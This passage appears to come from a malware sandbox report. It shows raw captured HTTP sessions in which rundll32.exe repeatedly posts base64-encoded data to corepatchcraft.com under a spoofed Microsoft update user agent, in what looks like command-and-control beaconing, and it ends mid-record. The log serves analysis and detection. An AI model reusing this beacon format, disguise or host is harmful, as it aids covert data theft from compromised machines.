                        2025-01-16 05:03:05 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:05 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:05 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:05 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        52 | 192.168.2.6 | 64429 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:06 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:06 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:06 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:06 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        53 | 192.168.2.6 | 64430 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:07 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:08 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:08 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        54 | 192.168.2.6 | 64431 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:09 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:09 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:09 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        55 | 192.168.2.6 | 64432 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:10 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:11 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:10 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        56 | 192.168.2.6 | 64433 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:11 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:12 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:12 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        57 | 192.168.2.6 | 64434 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:13 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:13 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:13 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        58 | 192.168.2.6 | 64435 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:14 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:15 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:14 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        59 | 192.168.2.6 | 64436 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:16 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:16 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:16 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        60 | 192.168.2.6 | 64437 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:17 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:17 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:17 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        61 | 192.168.2.6 | 64438 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:18 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:19 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:18 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        62 | 192.168.2.6 | 64439 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:19 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:20 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:20 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        63 | 192.168.2.6 | 64440 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:21 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:21 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:21 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        64 | 192.168.2.6 | 64441 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:22 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:23 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:23 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        65 | 192.168.2.6 | 64442 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:24 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:24 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:24 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        66 | 192.168.2.6 | 64443 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:25 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:26 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:25 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        67 | 192.168.2.6 | 64444 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:27 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:27 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:27 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        68 | 192.168.2.6 | 64445 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:28 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:28 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:28 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        69 | 192.168.2.6 | 64448 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:29 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:30 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:30 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        70 | 192.168.2.6 | 64449 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:31 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:31 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:31 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        71 | 192.168.2.6 | 64450 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:32 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:32 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:32 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        72 | 192.168.2.6 | 64451 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:33 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:34 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:34 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
